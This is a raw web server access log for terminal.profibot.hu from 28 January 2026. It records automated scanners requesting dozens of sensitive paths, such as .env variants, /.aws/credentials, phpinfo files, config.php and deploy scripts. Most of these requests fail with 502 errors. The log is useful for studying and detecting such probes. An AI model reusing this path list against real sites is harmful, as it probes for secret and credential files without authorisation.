185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/app_dev.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/config_dev.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/index-dev.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/index-test.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/test/index.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/dev/index.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/dev/config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/maintenance.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/maintenance.html" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/under-construction.html" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/down.html" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/.maintenance" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/install/install.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/setup/setup.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/setup/index.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/upgrade.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/upgrade/index.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/upgrader.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/migrate.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/migration.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/console.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/scripts/install.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/scripts/db.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/scripts/deploy.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/env.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/.env.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/backup.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/test.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/debug.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/logs.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/deploy.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/init.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/install.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/uninstall.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/remove.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/install.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/update.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/delete.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/sample.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/example.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/example-config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:52 +0000] - - 502 - GET https terminal.profibot.hu "/sample-config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:02:38:22 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 217.182.64.155] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0" "-" +[28/Jan/2026:02:46:18 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 34.214.144.136] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.96 Safari/537.36 Edge/18.19582" "-" +[28/Jan/2026:02:46:18 +0000] - - 502 - GET https terminal.profibot.hu "/favicon.ico" [Client 34.214.144.136] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.96 Safari/537.36 Edge/18.19582" "https://terminal.profibot.hu/" +[28/Jan/2026:02:46:22 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 34.214.144.136] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "-" +[28/Jan/2026:02:46:22 +0000] - - 502 - GET https terminal.profibot.hu "/favicon.ico" [Client 34.214.144.136] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "https://terminal.profibot.hu/" +[28/Jan/2026:03:01:21 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 23.27.145.27] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[28/Jan/2026:03:05:27 +0000] - - 400 - GET http terminal.profibot.hu "/" [Client 181.214.218.190] [Length 654] [Gzip -] [Sent-to ] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36" "-" +[28/Jan/2026:03:05:56 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 91.90.120.17] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36" "-" +[28/Jan/2026:03:05:57 +0000] - - 301 - GET http terminal.profibot.hu "/favicon.ico" [Client 91.90.120.17] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[28/Jan/2026:03:06:32 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 43.250.207.107] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36" "-" +[28/Jan/2026:03:07:11 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 34.143.138.199] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 12) Chrome/111.0 Mobile Safari/537.36" "-" +[28/Jan/2026:03:07:11 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 34.143.138.199] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 12) Chrome/111.0 Mobile Safari/537.36" "-" +[28/Jan/2026:03:07:12 +0000] - - 301 - GET http terminal.profibot.hu "/wordpress/" [Client 34.143.138.199] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (X11; Linux x86_64) Firefox/117.0" "-" +[28/Jan/2026:03:07:12 +0000] - - 502 - GET https terminal.profibot.hu "/wordpress/" [Client 34.143.138.199] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (X11; Linux x86_64) Firefox/117.0" "-" +[28/Jan/2026:04:01:48 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 195.178.110.132] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[28/Jan/2026:05:07:07 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 149.57.180.35] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[28/Jan/2026:06:49:48 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[28/Jan/2026:06:49:48 +0000] - - 502 - GET https terminal.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://terminal.profibot.hu/" +[28/Jan/2026:07:41:58 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:07:41:58 +0000] - - 502 - GET https terminal.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:07:41:58 +0000] - - 502 - GET https terminal.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:07:41:58 +0000] - - 502 - GET https terminal.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:10:01:08 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 52.192.123.92] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[28/Jan/2026:10:01:08 +0000] - - 502 - HEAD https terminal.profibot.hu "/apps" [Client 52.192.123.92] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[28/Jan/2026:10:01:09 +0000] - - 502 - POST https terminal.profibot.hu "/apps" [Client 52.192.123.92] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[28/Jan/2026:12:26:38 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:12:26:38 +0000] - - 502 - GET https terminal.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:12:26:38 +0000] - - 502 - GET https terminal.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:12:26:38 +0000] - - 502 - GET https terminal.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:12:53:56 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 66.132.153.137] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:13:01:28 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 206.168.34.213] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:13:59:32 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 35.192.138.69] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[28/Jan/2026:13:59:33 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 35.192.138.69] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://terminal.profibot.hu" +[28/Jan/2026:14:23:38 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 185.177.72.56] [Length 166] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:38 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:38 +0000] - - 502 - GET https terminal.profibot.hu "/info.php.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:38 +0000] - - 502 - GET https terminal.profibot.hu "/php-info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:38 +0000] - - 502 - GET https terminal.profibot.hu "/newinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:38 +0000] - - 502 - GET https terminal.profibot.hu "/siteinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:38 +0000] - - 502 - GET https terminal.profibot.hu "/info.php.1" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:38 +0000] - - 502 - GET https terminal.profibot.hu "/admin/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:38 +0000] - - 502 - GET https terminal.profibot.hu "/pageinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:38 +0000] - - 502 - GET https terminal.profibot.hu "/info.php.back" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:38 +0000] - - 502 - GET https terminal.profibot.hu "/phpbb/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:38 +0000] - - 502 - GET https terminal.profibot.hu "/release_info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:38 +0000] - - 502 - GET https terminal.profibot.hu "/test/info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:38 +0000] - - 502 - GET https terminal.profibot.hu "/info" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:38 +0000] - - 502 - GET https terminal.profibot.hu "/info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:38 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.php3" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:38 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.php.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/info.php.save.1" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/info.php_" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/_info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/admin_phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/dbinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/admin_info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/credentials" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.php.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/admin/admin_phpinfo.php4" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/pinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env.backup" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env_sample" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env.old" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env.www" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.docker/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env.dev" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env.example" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env_1" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env.stage" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/config.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.pam_environment" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.environment" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env.production" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env.production.local" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/env.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.powenv" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.rbenv-gemsets" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.envs" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env.docker" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env.sample" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env_bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env.development.local" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:39 +0000] - - 502 - GET https terminal.profibot.hu "/.env-example" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env.prod" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env.docker.dev" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env.test" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:40 